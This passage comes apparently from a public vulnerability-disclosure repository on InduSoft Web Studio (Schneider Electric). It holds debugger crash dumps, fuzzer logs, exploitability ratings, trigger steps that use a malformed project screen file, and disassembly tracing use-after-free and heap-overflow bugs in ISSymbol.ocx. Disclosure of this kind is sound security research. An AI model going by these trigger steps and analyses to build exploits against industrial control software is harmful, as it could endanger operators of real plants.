APPDATA=C:\Users\user\AppData\Roaming 184 | CommonProgramFiles=C:\Program Files\Common Files 185 | COMPUTERNAME=USER1D7E 186 | ComSpec=C:\Windows\system32\cmd.exe 187 | CRASHDIR=c:\crashes 188 | FP_NO_HOST_CHECK=NO 189 | FUZZEXCHANGE=y:\ 190 | HOMEDRIVE=C: 191 | HOMEPATH=\Users\user 192 | LOCALAPPDATA=C:\Users\user\AppData\Local 193 | LOGONSERVER=\\USER1D7E 194 | NUMBER_OF_PROCESSORS=1 195 | ORIGINAL=home.scr 196 | OS=Windows_NT 197 | Path=C:\Program Files\Schneider Electric\IGSS32\V10.0\GSS\;C:\Program Files\Parallels\Parallels Tools\Applications;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Windows Kits\8.0\Windows Performance Toolkit\;C:\Program Files\Schneider Electric\Pelco Viewer 3.0.0\Libs;c:\test;C:\Program Files\Common Files\Schneider Electric Shared\SSTA\;C:\Program Files\Common Files\Schneider Electric Shared\SRCSDK\ 198 | PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC 199 | PROCESSOR_ARCHITECTURE=x86 200 | PROCESSOR_IDENTIFIER=x86 Family 6 Model 58 Stepping 9, GenuineIntel 201 | PROCESSOR_LEVEL=6 202 | PROCESSOR_REVISION=3a09 203 | ProgramData=C:\ProgramData 204 | ProgramFiles=C:\Program Files 205 | PROMPT=$P$G 206 | PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ 207 | PUBLIC=C:\Users\Public 208 | SESSIONNAME=Console 209 | SystemDrive=C: 210 | SystemRoot=C:\Windows 211 | TEMP=C:\Users\user\AppData\Local\Temp 212 | TMP=C:\Users\user\AppData\Local\Temp 213 | USERDOMAIN=USER1D7E 214 | USERNAME=user 215 | USERPROFILE=C:\Users\user 216 | windir=C:\Windows 217 | 218 | ******************************************************************************* 219 | * * 220 | * Exception Analysis * 221 | * * 222 | ******************************************************************************* 223 | 224 | *** ERROR: Symbol file could not be found. Defaulted to export symbols for ISSymbol.ocx - 225 | *** ERROR: Module load completed but symbols could not be loaded for Viewer_.exe 226 | *** WARNING: Unable to verify checksum for mscorlib.ni.dll 227 | GetUrlPageData2 (WinHttp) failed: 12007. 228 | 229 | FAULTING_IP: 230 | unknown!printable+0 231 | 44206e69 ?? ??? 232 | 233 | EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) 234 | .exr 0xffffffffffffffff 235 | ExceptionAddress: 44206e69 236 | ExceptionCode: c0000005 (Access violation) 237 | ExceptionFlags: 00000000 238 | NumberParameters: 2 239 | Parameter[0]: 00000000 240 | Parameter[1]: 44206e69 241 | Attempt to read from address 44206e69 242 | 243 | DEFAULT_BUCKET_ID: WRONG_SYMBOLS 244 | 245 | PROCESS_NAME: Viewer_.exe 246 | 247 | ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. 248 | 249 | EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. 250 | 251 | EXCEPTION_PARAMETER1: 00000000 252 | 253 | EXCEPTION_PARAMETER2: 44206e69 254 | 255 | READ_ADDRESS: 44206e69 256 | 257 | FOLLOWUP_IP: 258 | unknown!printable+0 259 | 44206e69 ?? ??? 260 | 261 | FAILED_INSTRUCTION_ADDRESS: 262 | unknown!printable+0 263 | 44206e69 ?? ??? 264 | 265 | NTGLOBALFLAG: 0 266 | 267 | APPLICATION_VERIFIER_FLAGS: 0 268 | 269 | APP: viewer_.exe 270 | 271 | MANAGED_STACK: !dumpstack -EE 272 | !dumpstack -EE 273 | No export dumpstack found 274 | 275 | PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS 276 | 277 | BUGCHECK_STR: APPLICATION_FAULT_WRONG_SYMBOLS 278 | 279 | LAST_CONTROL_TRANSFER: from 63f51eef to 44206e69 280 | 281 | STACK_TEXT: 282 | WARNING: Frame IP not in any known module. Following frames may be wrong. 283 | 0012ba04 63f51eef 00000001 63f51fe4 103f6258 0x44206e69 284 | 0012ba0c 63f51fe4 103f6258 0012bb20 10260e83 mfc90u!CException::Delete+0xd 285 | 0012ba18 10260e83 01936b5b 00000008 0000000f mfc90u!AfxTryCleanup+0x1d 286 | 0012bb2c 10261cf9 0012bf14 01931327 0047001c ISSymbol!DllUnregisterServer+0x257023 287 | 0012c350 1028a0fa 0012d10c 019313d7 00000008 ISSymbol!DllUnregisterServer+0x257e99 288 | 0012c3a0 10031f70 0012d10c 00000001 01930223 ISSymbol!DllUnregisterServer+0x28029a 289 | 0012d254 10025fdd 0a4ab980 00000000 10392134 ISSymbol!DllUnregisterServer+0x28110 290 | 0012d2ec 1002ff68 0a45dba0 80000000 80000000 ISSymbol!DllUnregisterServer+0x1c17d 291 | 0012d9d8 10022136 0a45acd0 01932077 00000000 ISSymbol!DllUnregisterServer+0x26108 292 | 0012f000 1001bfd2 019324bf 00000f50 0012f04c ISSymbol!DllUnregisterServer+0x182d6 293 | 0012f4c8 1003f68d 00000000 0193295b 0012f4ec ISSymbol!DllUnregisterServer+0x12172 294 | 0012f92c 63fd2927 003543ac 63fbfd23 6512b788 ISSymbol!DllUnregisterServer+0x3582d 295 | 0012f9dc 63fc03f0 10395008 00000001 00000000 mfc90u!_AfxDispatchCall+0x10 296 | 0012fa80 63fc11d6 00000001 00000060 63f05f88 mfc90u!COleDispatchImpl::Invoke+0x388 297 | 0012fb54 63fdee36 00000060 00000001 00000000 mfc90u!COleDispatchDriver::InvokeHelperV+0x324 298 | 0012fb7c 63f8c7d6 00000060 00000001 00000000 mfc90u!COleControlSite::InvokeHelperV+0x57 299 | 0012fb9c 004021f1 005dba18 00000060 00000001 mfc90u!CWnd::InvokeHelper+0x27 300 | 0012fbc4 0040d047 0121cf38 005db950 005db850 Viewer_+0x21f1 301 | 0012fbdc 0040d0f4 005db850 0012fc90 63f5fafa Viewer_+0xd047 302 | 0012fbe8 63f5fafa 00000064 01135a10 00000113 Viewer_+0xd0f4 303 | 0012fc90 63f5f6cc 00000113 00000064 00000000 mfc90u!CWnd::OnWndMsg+0x407 304 | 0012fcb0 0040a36c 00000113 00000064 00000000 mfc90u!CWnd::WindowProc+0x24 305 | 0012fcc8 63f5e2f2 00000113 00000064 00000000 Viewer_+0xa36c 306 | 0012fd30 63f5e57e 00000000 001502de 00000113 mfc90u!AfxCallWndProc+0xa3 307 | 0012fd54 63f5c234 001502de 00000113 00000064 mfc90u!AfxWndProc+0x37 308 | 0012fd9c 76fcc4e7 001502de 00000113 00000064 mfc90u!AfxWndProcBase+0x56 309 | 0012fdc8 76fcc5e7 63f5c1de 001502de 00000113 user32!InternalCallWinProc+0x23 310 | 0012fe40 76fccc19 002f8b9c 63f5c1de 001502de user32!UserCallWinProcCheckWow+0x14b 311 | 0012fea0 76fccc70 63f5c1de 00000000 0012fee0 user32!DispatchMessageWorker+0x35e 312 | 0012feb0 63f9e491 002f50a0 00000000 0041c6d0 user32!DispatchMessageW+0xf 313 | 0012fec0 63f9eb18 0041c6d0 0041c6d0 ffffffff mfc90u!AfxInternalPumpMessage+0x40 314 | 0012fee0 63f6af81 0041c818 00000001 00000000 mfc90u!CWinThread::Run+0x5b 315 | 0012fef4 0040507f 00400000 00000000 002e1dd6 mfc90u!AfxWinMain+0x6a 316 | 0012ff88 7726ee1c 7ffd6000 0012ffd4 773637eb Viewer_+0x507f 317 | 0012ff94 773637eb 7ffd6000 773512b3 00000000 kernel32!BaseThreadInitThunk+0xe 318 | 0012ffd4 773637be 004051ee 7ffd6000 00000000 ntdll!__RtlUserThreadStart+0x70 319 | 0012ffec 00000000 004051ee 7ffd6000 00000000 ntdll!_RtlUserThreadStart+0x1b 320 | 321 | 322 | STACK_COMMAND: ~0s; .ecxr ; kb 323 | 324 | SYMBOL_STACK_INDEX: 0 325 | 326 | SYMBOL_NAME: unknown!printable+0 327 | 328 | FOLLOWUP_NAME: MachineOwner 329 | 330 | MODULE_NAME: unknown 331 | 332 | IMAGE_NAME: unknown 333 | 334 | DEBUG_FLR_IMAGE_TIMESTAMP: 0 335 | 336 | FAILURE_BUCKET_ID: WRONG_SYMBOLS_c0000005_unknown!printable 337 | 338 | BUCKET_ID: APPLICATION_FAULT_WRONG_SYMBOLS_BAD_IP_unknown!printable+0 339 | 340 | WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/Viewer__exe/1201_1404_202_0/533cc8c5/unknown/0_0_0_0/bbbbbbb4/c0000005/44206e69.htm?Retriage=1 341 | 342 | Followup: MachineOwner 343 | --------- 344 | 345 | 346 | 347 | !exploitable 1.6.0.0 348 | HostMachine\HostUser 349 | Executing Processor Architecture is x86 350 | Debuggee is in User Mode 351 | Debuggee is a user mode small dump file 352 | Event Type: Exception 353 | Exception Faulting Address: 0x44206e69 354 | Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) 355 | Exception Sub-Type: Read Access Violation 356 | 357 | Exception Hash (Major/Minor): 0x22c0e1d3.0xa4733f60 358 | 359 | Hash Usage : Stack Trace: 360 | Major+Minor : Unknown 361 | Major+Minor : mfc90u!CException::Delete+0xd 362 | Major+Minor : mfc90u!AfxTryCleanup+0x1d 363 | Major+Minor : ISSymbol!DllUnregisterServer+0x257023 364 | Major+Minor : ISSymbol!DllUnregisterServer+0x257e99 365 | Minor : ISSymbol!DllUnregisterServer+0x28029a 366 | Minor : ISSymbol!DllUnregisterServer+0x28110 367 | Minor : ISSymbol!DllUnregisterServer+0x1c17d 368 | Minor : ISSymbol!DllUnregisterServer+0x26108 369 | Minor : ISSymbol!DllUnregisterServer+0x182d6 370 | Minor : ISSymbol!DllUnregisterServer+0x12172 371 | Minor : ISSymbol!DllUnregisterServer+0x3582d 372 | Minor : mfc90u!_AfxDispatchCall+0x10 373 | Minor : mfc90u!COleDispatchImpl::Invoke+0x388 374 | Minor : mfc90u!COleDispatchDriver::InvokeHelperV+0x324 375 | Minor : mfc90u!COleControlSite::InvokeHelperV+0x57 376 | Minor : mfc90u!CWnd::InvokeHelper+0x27 377 | Minor : Viewer_+0x21f1 378 | Minor : Viewer_+0xd047 379 | Minor : Viewer_+0xd0f4 380 | Minor : mfc90u!CWnd::OnWndMsg+0x407 381 | Minor : mfc90u!CWnd::WindowProc+0x24 382 | Minor : Viewer_+0xa36c 383 | Minor : mfc90u!AfxCallWndProc+0xa3 384 | Minor : mfc90u!AfxWndProc+0x37 385 | Minor : mfc90u!AfxWndProcBase+0x56 386 | Minor : user32!InternalCallWinProc+0x23 387 | Minor : user32!UserCallWinProcCheckWow+0x14b 388 | Minor : user32!DispatchMessageWorker+0x35e 389 | Minor : user32!DispatchMessageW+0xf 390 | Minor : mfc90u!AfxInternalPumpMessage+0x40 391 | Minor : mfc90u!CWinThread::Run+0x5b 392 | Minor : mfc90u!AfxWinMain+0x6a 393 | Minor : Viewer_+0x507f 394 | Minor : kernel32!BaseThreadInitThunk+0xe 395 | Minor : ntdll!__RtlUserThreadStart+0x70 396 | Minor : ntdll!_RtlUserThreadStart+0x1b 397 | Instruction Address: 0x0000000044206e69 398 | 399 | Description: Read Access Violation at the Instruction Pointer 400 | Short Description: ReadAVonIP 401 | Exploitability Classification: EXPLOITABLE 402 | Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at Unknown Symbol @ 0x0000000044206e69 called from mfc90u!CException::Delete+0x000000000000000d (Hash=0x22c0e1d3.0xa4733f60) 403 | 404 | Access violations at the instruction pointer are exploitable if not near NULL. 405 | Closing open log file c:\crashes\crash_0fc4_2014-05-16_16-20-03-579.log 406 | -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx Use After Free EXPLOITABLE/logs/viewer.log: -------------------------------------------------------------------------------- 1 | [+] Target command line: ""C:\Program Files\InduSoft Web Studio v7.1\BIN\Viewer_.exe" /nosplash /noprogressbar /ds1:localhost /dsp:1234 /url:"file://y:\\PCDemo\PCDemo.APP"" 2 | [+] DLL injected into the target process 1136 3 | [+] Exit on first #AV: "Yes" 4 | ModuleInit(): From process 'C:\Program Files\InduSoft Web Studio v7.1\BIN\Viewer_.exe' (PID: 1136) 5 | [+] Process exit code: 0x00000001 6 | [+] Target command line: ""C:\Program Files\InduSoft Web Studio v7.1\BIN\Viewer_.exe" /nosplash /noprogressbar /ds1:localhost /dsp:1234 /url:"file://y:\\PCDemo\PCDemo.APP"" 7 | [+] DLL injected into the target process 1776 8 | [+] Exit on first #AV: "Yes" 9 | ModuleInit(): From process 'C:\Program Files\InduSoft Web Studio v7.1\BIN\Viewer_.exe' (PID: 1776) 10 | [!] EXCEPTION OCCURS: 11 | STATUS_ACCESS_VIOLATION at 0x69206e75 12 | Access type: Read 13 | Address: 0x69206e75 14 | EAX=0x63f00062 EBX=0x0012bb20 ECX=0x0a614cb0 EDX=0x00000000 15 | ESI=0x0012ba94 EDI=0x005d50c8 EBP=0x0012bb2c 16 | 17 | [+] 159388486 bytes of minidump has been written to the "c:\crashes\0xC0000005_0x69206E75_16.05_16.15.52.DMP" 18 | [+] Target command line: ""C:\Program Files\InduSoft Web Studio v7.1\BIN\Viewer_.exe" /nosplash /noprogressbar /ds1:localhost /dsp:1234 /url:"file://y:\\PCDemo\PCDemo.APP"" 19 | [+] DLL injected into the target process 1660 20 | [+] Exit on first #AV: "Yes" 21 | ModuleInit(): From process 'C:\Program Files\InduSoft Web Studio v7.1\BIN\Viewer_.exe' (PID: 1660) 22 | [!] EXCEPTION OCCURS: 23 | STATUS_ACCESS_VIOLATION at 0x44206e69 24 | Access type: Read 25 | Address: 0x44206e69 26 | EAX=0x63f00065 EBX=0x0012bb20 ECX=0x0a4aedf8 EDX=0x00000000 27 | ESI=0x0012ba94 EDI=0x002f5080 EBP=0x0012bb2c 28 | 29 | [+] 167660714 bytes of minidump has been written to the "c:\crashes\0xC0000005_0x44206E69_16.05_16.20.02.DMP" 30 | [+] Process exit code: 0xc0000005 31 | -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx Use After Free EXPLOITABLE/testcase: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx Use After Free EXPLOITABLE/testcase -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx!DllCanUnloadNow Memory Corruption EXPLOITABLE/analysis.txt: -------------------------------------------------------------------------------- 1 | Description: User Mode Write AV 2 | Short Description: WriteAV 3 | Exploitability Classification: EXPLOITABLE 4 | Recommended Bug Title: Exploitable - User Mode Write AV starting at ISSymbol!DllCanUnloadNow+0x0000000000078f4d (Hash=0x11f3963d.0x94308082) 5 | 6 | *** Product version 7 | 8 | Indusoft 7.1 SP2 Patch 4 9 | See also screenshots in attachment 10 | 11 | *** Trigger 12 | 13 | 0. The malformed file is Project/Screen/home.scr -- see original home.scr.orig in the same directory. 14 | 15 | 1. Open the crafted .app file (Indusoft Project) in Indusoft Viewer (can be done from the Indusoft Web Studio -> click 'Run project') 16 | 2. Click few error Message Box'es 17 | 3. Finally, click on the 'Alarms' button in the lower down corner of the screen. 18 | 19 | Actually, the vulnerability is triggered immediately after step 2, which generates the 1st chance exception due to corrupted memory execution. But step 3 is necessary to take only when the program is not being debugged. 20 | 21 | *** Analysis 22 | 23 | FAULTING_IP: 24 | ISSymbol!DllCanUnloadNow+78f4d 25 | 103ce470 0000 add byte ptr [eax],al 26 | … 27 | 28 | The following memory was executed at EIP when it hit the 1st chance exception: 29 | 30 | ISSymbol!DllCanUnloadNow+0x78f4d: 31 | 103ce470 0000 add byte ptr [eax],al 32 | 103ce472 0000 add byte ptr [eax],al 33 | 103ce474 0000 add byte ptr [eax],al 34 | 103ce476 0000 add byte ptr [eax],al 35 | 103ce478 0000 add byte ptr [eax],al 36 | 103ce47a 0000 add byte ptr [eax],al 37 | 103ce47c e0dc loopne ISSymbol!DllCanUnloadNow+0x78f37 (103ce45a) 38 | 103ce47e 40 inc eax 39 | 40 | The control transfer to the corrupted memory offset was done from here: 41 | 42 | ISSymbol!DllUnregisterServer+0x264b61: 43 | --> starts calculation of call eax: 44 | 1026e9c1 89854cffffff mov dword ptr [ebp-0B4h],eax 45 | 1026e9c7 8b8d4cffffff mov ecx,dword ptr [ebp-0B4h] 46 | 1026e9cd 8b5104 mov edx,dword ptr [ecx+4] 47 | 1026e9d0 8995b8feffff mov dword ptr [ebp-148h],edx 48 | 1026e9d6 8b85b8feffff mov eax,dword ptr [ebp-148h] 49 | 1026e9dc 8b10 mov edx,dword ptr [eax] 50 | 1026e9de 8b8db8feffff mov ecx,dword ptr [ebp-148h] 51 | 1026e9e4 8b8284010000 mov eax,dword ptr [edx+184h] 52 | --> 1026e9ea ffd0 call eax <-- go to vuln 53 | 54 | The eax was calculated as follows: 55 | 56 | ISSymbol!DllUnregisterServer+0x264b61: 57 | 1026e9c1 89854cffffff mov dword ptr [ebp-0B4h],eax 58 | 1026e9c7 8b8d4cffffff mov ecx,dword ptr [ebp-0B4h] 59 | 1026e9cd 8b5104 mov edx,dword ptr [ecx+4] 60 | 1026e9d0 8995b8feffff mov dword ptr [ebp-148h],edx 61 | 1026e9d6 8b85b8feffff mov eax,dword ptr [ebp-148h] 62 | 1026e9dc 8b10 mov edx,dword ptr [eax] 63 | 1026e9de 8b8db8feffff mov ecx,dword ptr [ebp-148h] 64 | --> 1026e9e4 8b8284010000 mov eax,dword ptr [edx+184h] <-- wrong address at [edx+184] 65 | 1026e9ea ffd0 call eax -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx!DllCanUnloadNow Memory Corruption EXPLOITABLE/logs/viewer.log: -------------------------------------------------------------------------------- 1 | [+] Target command line: ""C:\Program Files\InduSoft Web Studio v7.1\BIN\Viewer_.exe" /nosplash /noprogressbar /ds1:localhost /dsp:1234 /url:"file://y:\PCDemo\Screen\\..\PCDemo.APP"" 2 | [+] DLL injected into the target process 2652 3 | [+] Exit on first #AV: "Yes" 4 | ModuleInit(): From process 'C:\Program Files\InduSoft Web Studio v7.1\BIN\Viewer_.exe' (PID: 2652) 5 | [!] EXCEPTION OCCURS: 6 | STATUS_ACCESS_VIOLATION at 0x103ce470 7 | Access type: Write 8 | Address: 0x103ce470 9 | EAX=0x103ce470 EBX=0x00000000 ECX=0x016ef154 EDX=0x103b7274 10 | ESI=0x5f1a1b3b EDI=0x012e4a08 EBP=0x0012bcb4 11 | 12 | [+] 152185863 bytes of minidump has been written to the "c:\crashes\0xC0000005_0x103CE470_16.05_23.04.09.DMP" 13 | [+] Process exit code: 0xc0000005 14 | -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx!DllCanUnloadNow Memory Corruption EXPLOITABLE/screens/version-product.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx!DllCanUnloadNow Memory Corruption EXPLOITABLE/screens/version-product.png -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx!DllCanUnloadNow Memory Corruption EXPLOITABLE/screens/version-viewer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx!DllCanUnloadNow Memory Corruption EXPLOITABLE/screens/version-viewer.png -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx!DllCanUnloadNow Memory Corruption EXPLOITABLE/testcase: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx!DllCanUnloadNow Memory Corruption EXPLOITABLE/testcase -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2014-XXXX: Schneider Electric InduSoft Web Access Memory Corruption Vulnerability (multiple) 4 | 5 | From "Hack the smart city 2014" competition 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery: Alisa Esage 10 | Vulnerability analysis: Alisa Esage 11 | Proof of concept: Alisa Esage -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/issymbol.ocx Heap Corruption +0x0000000000000268 EXPLOITABLE/analysis.txt: -------------------------------------------------------------------------------- 1 | InternalID: indusoft0007 2 | Target: Indusoft Web Studio 3 | Module: issymbol.ocx 4 | Type: heap overflow 5 | MSEC: EXPLOITABLE 6 | 7 | Crash context 8 | 9 | Description: User Mode Write AV Short Description: WriteAV Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at MSVCR90!memcpy+0x000000000000015c (Hash=0x05af6d57.0x6cfc84d3) User mode write access violations that are not near NULL are exploitable. 0:000> r eax=00000000 ebx=00000010 ecx=00000004 edx=00000000 esi=0a3020ed edi=0a320ff4 eip=62eaaf7c esp=0012a614 ebp=0012a61c iopl=0 nv up ei ng nz ac pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297 MSVCR90!memcpy+0x15c: 62eaaf7c 89448ffc mov dword ptr [edi+ecx*4-4],eax ds:0023:0a321000=???????? 10 | 11 | 0:000> kb ChildEBP RetAddr Args to Child 0012a61c 62ea69ed 0a455ff4 0a44bfb1 00000010 MSVCR90!memcpy+0x15c 0012a638 62553470 0a455ff4 00000010 0a44bfb1 MSVCR90!memcpy_s+0x4a 0012a650 62552e5b 0a455ff4 00000010 0a44bfb1 mfc90u!ATL::Checked::memcpy_s+0x17 0012a67c 101f21e3 0a455ff4 00000010 f5655f27 mfc90u!CArchive::Read+0x49 WARNING: Stack unwind information not available. Following frames may be wrong. 0012a758 1021e8f0 0012bad0 f5655067 f5373d43 ISSymbol!DllUnregisterServer+0x1e8383 0012a818 1025dae0 0012bad0 0a438f28 0a450b8c ISSymbol!DllUnregisterServer+0x214a90 0012a83c 10263d75 0012bad0 f565426b 0025d570 ISSymbol!DllUnregisterServer+0x253c80 0012ba14 10260d88 0012bad0 f5654353 00000008 ISSymbol!DllUnregisterServer+0x259f15 0012bb2c 10261cf9 0012bf14 f5653b2f 008c001b ISSymbol!DllUnregisterServer+0x256f28 … 12 | 13 | Analysis 14 | 15 | There is a loop near "ISSymbol!DllUnregisterServer+0x1e8383" which calls mfc90u!CArchive.Read(this,buf,0x10): 16 | 17 | .text:101F2188 @loop: ; CODE XREF: v_indusoft0007:loc_101F22DEj .text:101F2188 mov eax, [ebp+counter] .text:101F218B add eax, 1 .text:101F218E mov [ebp+counter], eax .text:101F2191 .text:101F2191 loc_101F2191: ; CODE XREF: v_indusoft0007+2A6j .text:101F2191 mov ecx, [ebp+counter] .text:101F2194 cmp ecx, [ebp+maxcounter] .text:101F2197 jge loc_101F22E3 .text:101F219D mov edx, [ebp+counter] .text:101F21A0 shl edx, 4 .text:101F21A3 mov eax, [ebp+var_C8] .text:101F21A9 lea ecx, [eax+edx+1ECh] .text:101F21B0 mov [ebp+lpBuf], ecx .text:101F21B3 mov edx, [ebp+arg_0] .text:101F21B6 mov eax, [edx+18h] .text:101F21B9 and eax, 1 .text:101F21BC neg eax .text:101F21BE sbb eax, eax .text:101F21C0 add eax, 1 .text:101F21C3 jz short loc_101F21D5 ; nMax .text:101F21C5 push 10h .text:101F21C7 mov ecx, [ebp+lpBuf] .text:101F21CA push ecx .text:101F21CB mov ecx, [ebp+arg_0] .text:101F21CE call mfc90u_6811 ; CArchive__Write(CArchive *this, const void *lpBuf, unsigned int nMax) .text:101F21D3 jmp short loc_101F21E3 .text:101F21D5 ; --------------------------------------------------------------------------- .text:101F21D5 .text:101F21D5 loc_101F21D5: ; CODE XREF: v_indusoft0007+2E3j .text:101F21D5 push 10h ; nMax .text:101F21D7 mov edx, [ebp+lpBuf] ; lpbuf .text:101F21DA push edx .text:101F21DB mov ecx, [ebp+arg_0] ; this .text:101F21DE call mfc90u_5767 ; CArchive__Read(CArchive *this, void *lpBuf, unsigned int nMax) 18 | 19 | The above loop iterates over a buffer of pointers 16 bytes at a time, and fails at the edge of the heap chunk: 20 | 21 | ISSymbol!DllUnregisterServer+0x1e8350: 101f21b0 894d9c mov dword ptr [ebp-64h],ecx ss:0023:0012a6f4=d45f450a 0:000> g 0a455ff4 38 00 40 0a 00 60 45 0a-00 a0 3a 00 ?? ?? ?? ?? 8.@..`E...:.???? 0a456004 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0a456014 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0a456024 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0a456034 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0a456044 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0a456054 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0a456064 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? eax=0a4548f8 ebx=00000000 ecx=0a455ff4 edx=00001510 esi=00000013 edi=00000008 eip=101f21b0 esp=0012a68c ebp=0012a758 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 ISSymbol!DllUnregisterServer+0x1e8350: 101f21b0 894d9c mov dword ptr [ebp-64h],ecx ss:0023:0012a6f4=e45f450a 0:000> g (f6c.684): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000010 ecx=00000004 edx=00000000 esi=0a44bfb1 edi=0a455ff4 eip=62eaaf7c esp=0012a614 ebp=0012a61c iopl=0 nv up ei ng nz ac pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297 MSVCR90!memcpy+0x15c: 62eaaf7c 89448ffc mov dword ptr [edi+ecx*4-4],eax ds:0023:0a456000=???????? 22 | 23 | The loop fails when the counter value reaches 151, while the maxcounter is 0x30001: 24 | 25 | 0:000> g Breakpoint 1 hit eax=00000151 ebx=00000000 ecx=00000151 edx=0a3bbfb1 esi=00000013 edi=00000008 eip=101f2194 esp=0012a68c ebp=0012a758 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 ISSymbol!DllUnregisterServer+0x1e8334: 101f2194 3b4df0 cmp ecx,dword ptr [ebp-10h] ss:0023:0012a748=00010003 0:000> g (9f4.ae8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000010 ecx=00000004 edx=00000000 esi=0a3bbfb1 edi=0a3c5ff4 eip=62eaaf7c esp=0012a614 ebp=0012a61c iopl=0 nv up ei ng nz ac pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297 MSVCR90!memcpy+0x15c: 62eaaf7c 89448ffc mov dword ptr [edi+ecx*4-4],eax ds:0023:0a3c6000=???????? 26 | 27 | Input taint 28 | 29 | The value 0x300001 is read from the file foodtank.scr at offset 5207. 30 | -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/issymbol.ocx Heap Corruption +0x0000000000000268 EXPLOITABLE/logs/windbg2.log: -------------------------------------------------------------------------------- 1 | Opened log file 'y:\crash2.log' 2 | 0:000> .lastevent 3 | Last event: 77c.b98: Access violation - code c0000005 (first chance) 4 | debugger time: Tue Jun 17 15:14:32.089 2014 (UTC + 4:00) 5 | 0:000> r 6 | eax=00000000 ebx=00000010 ecx=00000004 edx=00000000 esi=0a3020ed edi=0a320ff4 7 | eip=62eaaf7c esp=0012a614 ebp=0012a61c iopl=0 nv up ei ng nz ac pe cy 8 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297 9 | MSVCR90!memcpy+0x15c: 10 | 62eaaf7c 89448ffc mov dword ptr [edi+ecx*4-4],eax ds:0023:0a321000=???????? 11 | 0:000> u eip-30 l30 12 | MSVCR90!memcpy+0x12c: 13 | 62eaaf4c 89448fe4 mov dword ptr [edi+ecx*4-1Ch],eax 14 | 62eaaf50 8b448ee8 mov eax,dword ptr [esi+ecx*4-18h] 15 | 62eaaf54 89448fe8 mov dword ptr [edi+ecx*4-18h],eax 16 | 62eaaf58 8b448eec mov eax,dword ptr [esi+ecx*4-14h] 17 | 62eaaf5c 89448fec mov dword ptr [edi+ecx*4-14h],eax 18 | 62eaaf60 8b448ef0 mov eax,dword ptr [esi+ecx*4-10h] 19 | 62eaaf64 89448ff0 mov dword ptr [edi+ecx*4-10h],eax 20 | 62eaaf68 8b448ef4 mov eax,dword ptr [esi+ecx*4-0Ch] 21 | 62eaaf6c 89448ff4 mov dword ptr [edi+ecx*4-0Ch],eax 22 | 62eaaf70 8b448ef8 mov eax,dword ptr [esi+ecx*4-8] 23 | 